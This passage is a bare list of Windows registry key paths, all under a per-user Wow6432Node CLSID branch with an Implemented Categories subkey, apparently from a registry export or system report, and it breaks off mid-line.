HKEY_CURRENT_USER\Software\Classes\Wow6432Node\CLSID\{0006780B-0000-0000-C000-000000000046}\Implemented Categories\{56FFCC30-D398-11D0-B2AE-00A0C908FA49}
HKEY_CURRENT_USER\Software\Classes\Wow6432Node\CLSID\{00067820-0000-0000-C000-000000000046}\Implemented Categories\{56FFCC30-D398-11D0-B2AE-00A0C908FA49}
HKEY_CURRENT_USER\Software\Classes\Wow6432Node\CLSID\{00067821-0000-0000-C000-000000000046}\Implemented Categories\{56FFCC30-D398-11D0-B2AE-00A0C908FA49}
HKEY_CURRENT_USER\Software\Classes\Wow6432Node\CLSID\{00067822-0000-0000-C000-000000000046}\Implemented Categories\{56FFCC30-D398-11D0-B2AE-00A0C908FA49}
HKEY_CURRENT_USER\Software\Classes\Wow6432Node\CLSID\{00067823-0000-0000-C000-000000000046}\Implemented Categories\{56FFCC30-D398-11D0-B2AE-00A0C908FA49}
HKEY_CURRENT_USER\Software\Classes\Wow6432Node\CLSID\{00067828-0000-0000-C000-000000000046}\Implemented Categories\{56FFCC30-D398-11D0-B2AE-00A0C908FA49}
HKEY_CURRENT_USER\Software\Classes\Wow6432Node\CLSID\{00067829-0000-0000-C000-000000000046}\Implemented Categories\{56FFCC30-D398-11D0-B2AE-00A0C908FA49}
HKEY_CURRENT_USER\Software\Classes\Wow6432Node\CLSID\{0006F005-0000-0000-C000-000000000046}\Implemented Categories\{56FFCC30-D398-11D0-B2AE-00A0C908FA49}
HKEY_CURRENT_USER\Software\Classes\Wow6432Node\CLSID\{0006F006-0000-0000-C000-000000000046}\Implemented Categories\{56FFCC30-D398-11D0-B2AE-00A0C908FA49}
HKEY_CURRENT_USER\Software\Classes\Wow6432Node\CLSID\{0006F011-0000-0000-C000-000000000046}\Implemented Categories\{56FFCC30-D398-11D0-B2AE-00A0C908FA49}
HKEY_CURRENT_USER\Software\Classes\Wow6432Node\CLSID\{0006F017-0000-0000-C000-000000000046}\Implemented Categories\{56FFCC30-D398-11D0-B2AE-00A0C908FA49}
HKEY_CURRENT_USER\Software\Classes\Wow6432Node\CLSID\{0006F018-0000-0000-C000-000000000046}\Implemented Categories\{56FFCC30-D398-11D0-B2AE-00A0C908FA49}
HKEY_CURRE